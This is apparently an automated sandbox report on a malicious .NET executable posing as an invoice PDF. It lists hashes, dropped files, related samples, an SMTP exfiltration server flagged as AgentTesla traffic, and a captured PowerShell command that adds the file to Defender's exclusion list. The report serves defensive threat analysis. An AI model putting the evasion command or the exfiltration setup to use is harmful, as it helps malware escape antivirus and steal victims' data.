                                                  		unknown

                                                  Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  208.91.199.225
                                                  		us2.smtp.mailhostbox.comUnited States
                                                  		394695PUBLIC-DOMAIN-REGISTRYUSfalse

                                                  General Information

                                                  Joe Sandbox Version:33.0.0 White Diamond
                                                  Analysis ID:491534
                                                  Start date:27.09.2021
                                                  Start time:17:18:23
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 10m 31s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Sample file name:INVOICE & TELEX BL_PDF.exe
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Number of analysed new started processes analysed:23
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.adwa.spyw.evad.winEXE@8/6@2/1
                                                  EGA Information:Failed
                                                  HDC Information:
                                                  • Successful, ratio: 1.2% (good quality ratio 1.1%)
                                                  • Quality average: 59.5%
                                                  • Quality standard deviation: 32.6%
                                                  HCA Information:
                                                  • Successful, ratio: 99%
                                                  • Number of executed functions: 29
                                                  • Number of non-executed functions: 3
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  • Found application associated with file extension: .exe
                                                  Warnings:
                                                  Show All
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                  • Excluded IPs from analysis (whitelisted): 20.49.157.6, 20.54.110.249, 40.112.88.60, 23.0.174.200, 23.0.174.185, 20.199.120.151, 23.10.249.26, 23.10.249.43, 20.199.120.85, 20.82.209.183, 20.199.120.182
                                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, wu-shim.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  17:19:27API Interceptor721x Sleep call for process: INVOICE & TELEX BL_PDF.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  208.91.199.225SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousBrowse
                                                    New Order.docGet hashmaliciousBrowse
                                                      LFC _ X#U00e1c nh#U1eadn #U0111#U01a1n h#U00e0ng _ Kh#U1ea9n c#U1ea5p,pdf.exeGet hashmaliciousBrowse
                                                        #U0916#U0930#U0940#U0926 #U0906#U0926#U0947#U0936-34002174,pdf.exeGet hashmaliciousBrowse
                                                          #Uc7ac #Uc8fc#Ubb38 #Ud655#Uc778,pdf.exeGet hashmaliciousBrowse
                                                            KLC45E_92421_PI.exeGet hashmaliciousBrowse
                                                              MONO Nueva orden - E41140,PDF.exeGet hashmaliciousBrowse
                                                                SO230921.exeGet hashmaliciousBrowse
                                                                  from-iso_PSC ___ - E41140,PDF.EXEGet hashmaliciousBrowse
                                                                    Payment copy.exeGet hashmaliciousBrowse
                                                                      COMTAC LISTA URGENTE ORDEN 92121,pdf.exeGet hashmaliciousBrowse
                                                                        Payment Advice for order 19203-319203-4.exeGet hashmaliciousBrowse
                                                                          Po#6672.pdf.exeGet hashmaliciousBrowse
                                                                            04142021_10RD0207S0N0000,pdf.exeGet hashmaliciousBrowse
                                                                              Order Confirmation _ Urgent,pdf.exeGet hashmaliciousBrowse
                                                                                New ORDER.docGet hashmaliciousBrowse
                                                                                  RFQ_AP65425652_032421 segera.exeGet hashmaliciousBrowse
                                                                                    INTR_ORDER 5676-SEPT1521,pdf.exeGet hashmaliciousBrowse
                                                                                      Order pending.xlsxGet hashmaliciousBrowse
                                                                                        TOP URGENT.exeGet hashmaliciousBrowse

                                                                                          Domains

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          us2.smtp.mailhostbox.comInquiry - Specifications 002021.exeGet hashmaliciousBrowse
                                                                                          • 208.91.198.143
                                                                                          #RFQ Medimpex International LLC.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.223
                                                                                          SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.225
                                                                                          New Order.docGet hashmaliciousBrowse
                                                                                          • 208.91.198.143
                                                                                          LFC _ X#U00e1c nh#U1eadn #U0111#U01a1n h#U00e0ng _ Kh#U1ea9n c#U1ea5p,pdf.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.223
                                                                                          #U0916#U0930#U0940#U0926 #U0906#U0926#U0947#U0936-34002174,pdf.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.225
                                                                                          #Uc7ac #Uc8fc#Ubb38 #Ud655#Uc778,pdf.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.225
                                                                                          4f7K9bfgNr.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.224
                                                                                          Curriculum Vitae Milani.exeGet hashmaliciousBrowse
                                                                                          • 208.91.198.143
                                                                                          Solicitud de cotizacion.exeGet hashmaliciousBrowse
                                                                                          • 208.91.198.143
                                                                                          New Order.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.223
                                                                                          KLC45E_92421_PI.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.223
                                                                                          PO-3242.xlsxGet hashmaliciousBrowse
                                                                                          • 208.91.199.223
                                                                                          MONO Nueva orden - E41140,PDF.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.223
                                                                                          SO230921.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.223
                                                                                          Products prices request.xlsxGet hashmaliciousBrowse
                                                                                          • 208.91.198.143
                                                                                          3qyhcUC9um.exeGet hashmaliciousBrowse
                                                                                          • 208.91.198.143
                                                                                          Payment Advice 09-22-2021 SKMBT03783930484080484904003TXT.exeGet hashmaliciousBrowse
                                                                                          • 208.91.198.143
                                                                                          from-iso_PSC ___ - E41140,PDF.EXEGet hashmaliciousBrowse
                                                                                          • 208.91.198.143
                                                                                          n267kM6LhuZHjzz.exeGet hashmaliciousBrowse
                                                                                          • 208.91.198.143

                                                                                          ASN

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                          PUBLIC-DOMAIN-REGISTRYUSrecital-239880844.xlsGet hashmaliciousBrowse
                                                                                          • 204.11.59.34
                                                                                          Inquiry - Specifications 002021.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.224
                                                                                          waff.xlsGet hashmaliciousBrowse
                                                                                          • 204.11.59.34
                                                                                          #RFQ Medimpex International LLC.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.223
                                                                                          SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.225
                                                                                          New Order.docGet hashmaliciousBrowse
                                                                                          • 208.91.199.225
                                                                                          LFC _ X#U00e1c nh#U1eadn #U0111#U01a1n h#U00e0ng _ Kh#U1ea9n c#U1ea5p,pdf.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.224
                                                                                          #U0916#U0930#U0940#U0926 #U0906#U0926#U0947#U0936-34002174,pdf.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.224
                                                                                          #Uc7ac #Uc8fc#Ubb38 #Ud655#Uc778,pdf.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.224
                                                                                          4f7K9bfgNr.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.224
                                                                                          Curriculum Vitae Milani.exeGet hashmaliciousBrowse
                                                                                          • 208.91.198.143
                                                                                          Solicitud de cotizacion.exeGet hashmaliciousBrowse
                                                                                          • 208.91.198.143
                                                                                          New Order.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.224
                                                                                          KLC45E_92421_PI.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.224
                                                                                          Request_For_Quotation#234242_signed_copy_document_september_rfq.exeGet hashmaliciousBrowse
                                                                                          • 162.215.240.160
                                                                                          PO-3242.xlsxGet hashmaliciousBrowse
                                                                                          • 208.91.199.223
                                                                                          MONO Nueva orden - E41140,PDF.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.224
                                                                                          SO230921.exeGet hashmaliciousBrowse
                                                                                          • 208.91.199.224
                                                                                          Products prices request.xlsxGet hashmaliciousBrowse
                                                                                          • 208.91.199.224
                                                                                          Payment Advice 09-22-2021 SKMBT03783930484080484904003TXT.exeGet hashmaliciousBrowse
                                                                                          • 208.91.198.143

                                                                                          JA3 Fingerprints

                                                                                          No context

                                                                                          Dropped Files

                                                                                          No context

                                                                                          Created / dropped Files

                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\INVOICE & TELEX BL_PDF.exe.log
                                                                                          Process:C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1401
                                                                                          Entropy (8bit):5.343588497030622
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84aE4K1:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzh
                                                                                          MD5:3AD5DAA3F0DFACAC83B0F64B767AADBE
                                                                                          SHA1:03A3F4FF83FE2AFC2A50EF585EFE45B4D94EAAB1
                                                                                          SHA-256:1B877B320C76F556C1F5E51C2DF8A52316EA16F1B34D7FCA5C222BE500C5AD77
                                                                                          SHA-512:7EC991941E397C870633B525076F0EE09AEEF503B9701BE2D9C96CDA500B717BC71B2F6A266B6C26E0C220D9537621BD8986F98E90E8048CE8E9DAE819420122
                                                                                          Malicious:true
                                                                                          Reputation:low
                                                                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):15708
                                                                                          Entropy (8bit):5.5307953202526265
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:zt9gqsnVCzM07f4gSBKnj/ED9jTD1GEnWt:K4fJ4KoD97wEY
                                                                                          MD5:3114157E4EB16E173C55AE5B0CED1715
                                                                                          SHA1:B4F4755DDE6D34EE26013BE16F3CE32A4B3A83C0
                                                                                          SHA-256:3C76EE4243B062C4E21908DC2152D6CF3349252ECCE6A13B0CF270441014DC8D
                                                                                          SHA-512:9DEC72A7940BD31B5F31F69FA6E2E55F5BB1CD56B669BA8E192920B98D30FC5CC1244152C85ABC85ED1983F7AA818134052038B64A89C32E81DF3EF921C88922
                                                                                          Malicious:false
                                                                                          Reputation:low
                                                                                          Preview: @...e...........i.......h.8./.(...........J.....................H...............<@.^.L."My...:;..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.Configuration..............................................@.U.@.G.@.T.@..>@..)@..?@..o@..o@..o@..?@.V.@...@...@...@.V.@.H.@.X.@.[.@.NT@.HT@..S@..S@.hT@..S@.
                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4jek5pvp.a5z.ps1
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:very short file (no magic)
                                                                                          Category:dropped
                                                                                          Size (bytes):1
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:U:U
                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                          Malicious:false
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview: 1
                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vegpwjxm.c1e.psm1
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:very short file (no magic)
                                                                                          Category:dropped
                                                                                          Size (bytes):1
                                                                                          Entropy (8bit):0.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:U:U
                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                          Malicious:false
                                                                                          Preview: 1
                                                                                          C:\Users\user\Documents\20210927\PowerShell_transcript.760639.5QIvx0iZ.20210927171929.txt
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1885
                                                                                          Entropy (8bit):5.169671927681671
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:BZevvh7oO+ShpqDYB1Z8FzNcJoZjeDKcJoZjPU1pAcIZZRi:BZenh7NBqDo1Z8gVpyU16cIZPi
                                                                                          MD5:6E8871B96093317292C775BF4ECF3BFC
                                                                                          SHA1:C88766CFF3C042AA7D3D1FA59A780668EA2C358E
                                                                                          SHA-256:7898CB4A896ECC0DE4AE11A2EA2C6FFB2D58B8915DF5F4EEB0E201C99EBA05E0
                                                                                          SHA-512:FAF6BA6FD1176AC700178471477BE5023F1D83EF0DA6380DB4DA0BCA250EB6C14FE2F0AD37DBA5C7B009A4CCEAB8C47C477E6B4EB8F0B8A483515E5604071C13
                                                                                          Malicious:false
                                                                                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20210927171930..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 760639 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe..Process ID: 6256..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210927171930..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe..At line:1 char:64..+ ... -MpPreference -ExclusionPath C:\Users\user\Desktop\INVOICE & TELEX B .....+
                                                                                          C:\Windows\System32\drivers\etc\hosts
                                                                                          Process:C:\Users\user\Desktop\INVOICE & TELEX BL_PDF.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:modified
                                                                                          Size (bytes):11
                                                                                          Entropy (8bit):2.663532754804255
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:iLE:iLE
                                                                                          MD5:B24D295C1F84ECBFB566103374FB91C5
                                                                                          SHA1:6A750D3F8B45C240637332071D34B403FA1FF55A
                                                                                          SHA-256:4DC7B65075FBC5B5421551F0CB814CAFDC8CACA5957D393C222EE388B6F405F4
                                                                                          SHA-512:9BE279BFA70A859608B50EF5D30BF2345F334E5F433C410EA6A188DCAB395BFF50C95B165177E59A29261464871C11F903A9ECE55B2D900FE49A9F3C49EB88FA
                                                                                          Malicious:true
                                                                                          Preview: ..127.0.0.1

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Entropy (8bit):6.825862359561513
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                          File name:INVOICE & TELEX BL_PDF.exe
                                                                                          File size:882688
                                                                                          MD5:22a2657bb48e3303f6f0a0fd1fdfe441
                                                                                          SHA1:d6a230a732f3d691a7fce60081f30627ffabd33d
                                                                                          SHA256:85627117b351e81655bb56b947b61a198d195a225db0e002ef476460b9f273ac
                                                                                          SHA512:5e24b5f9c3886c9fdeaa968ccc59882b24a4c4cf8d90f4ae7d44ba4ed96bc91800d2f98c1eace2426a5dfe7a16f7c1233b1d54607d17ccba490d9e03514d569c
                                                                                          SSDEEP:12288:X52s002Ce2nsnG3/TEbszQ4yejeIxJjtaTXOYVgqrmYBF0yI9STO3AbX8bwtxTse:zTIFMF+wGyVDidkAFjHoSa8F+2
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f.Qa..............0.................. ........@.. ....................................@................................

                                                                                          File Icon

                                                                                          Icon Hash:138e8eccece8cccc

                                                                                          Static PE Info

                                                                                          General

                                                                                          Entrypoint:0x4bfcf2
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                          Time Stamp:0x61511B66 [Mon Sep 27 01:16:22 2021 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:v4.0.30319
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                          Entrypoint Preview

                                                                                          Instruction
                                                                                          jmp dword ptr [00402000h]
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al

                                                                                          Data Directories

                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xbfca00x4f.text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc00000x19434.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xda0000xc.reloc
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                          Sections

                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x20000xbdcf80xbde00False0.68735727658data7.07881846434IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                          .rsrc0xc00000x194340x19600False0.391712207512data4.295708537IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .reloc0xda0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                          Resources

                                                                                          NameRVASizeTypeLanguageCountry
                                                                                          RT_ICON0xc01800x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                                                          RT_ICON0xd09b80x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295
                                                                                          RT_ICON0xd4bf00x25a8data
                                                                                          RT_ICON0xd71a80x10a8data
                                                                                          RT_ICON0xd82600x468GLS_BINARY_LSB_FIRST
                                                                                          RT_GROUP_ICON0xd86d80x4cdata
                                                                                          RT_VERSION0xd87340x33cdata
                                                                                          RT_MANIFEST0xd8a800x9b0XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators

                                                                                          Imports

                                                                                          DLLImport
                                                                                          mscoree.dll_CorExeMain

                                                                                          Version Infos

                                                                                          DescriptionData
                                                                                          Translation0x0000 0x04b0
                                                                                          LegalCopyrightCopyright F@Soft
                                                                                          Assembly Version1.0.6.2
                                                                                          InternalNameWindowsIdenti.exe
                                                                                          FileVersion1.0.6.0
                                                                                          CompanyNameF@Soft
                                                                                          LegalTrademarks
                                                                                          Comments
                                                                                          ProductNameDarwin AW
                                                                                          ProductVersion1.0.6.0
                                                                                          FileDescriptionDarwin AW
                                                                                          OriginalFilenameWindowsIdenti.exe

                                                                                          Network Behavior

                                                                                          Snort IDS Alerts

                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                          09/27/21-17:21:14.492064TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49826587192.168.2.3208.91.199.225

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Sep 27, 2021 17:21:12.930871010 CEST49826587192.168.2.3208.91.199.225
                                                                                          Sep 27, 2021 17:21:13.075288057 CEST58749826208.91.199.225192.168.2.3
                                                                                          Sep 27, 2021 17:21:13.075434923 CEST49826587192.168.2.3208.91.199.225
                                                                                          Sep 27, 2021 17:21:13.618143082 CEST58749826208.91.199.225192.168.2.3
                                                                                          Sep 27, 2021 17:21:13.618455887 CEST49826587192.168.2.3208.91.199.225
                                                                                          Sep 27, 2021 17:21:13.762670994 CEST58749826208.91.199.225192.168.2.3
                                                                                          Sep 27, 2021 17:21:13.762732983 CEST58749826208.91.199.225192.168.2.3
                                                                                          Sep 27, 2021 17:21:13.763956070 CEST49826587192.168.2.3208.91.199.225
                                                                                          Sep 27, 2021 17:21:13.905458927 CEST58749826208.91.199.225192.168.2.3
                                                                                          Sep 27, 2021 17:21:13.909387112 CEST49826587192.168.2.3208.91.199.225
                                                                                          Sep 27, 2021 17:21:14.053101063 CEST58749826208.91.199.225192.168.2.3
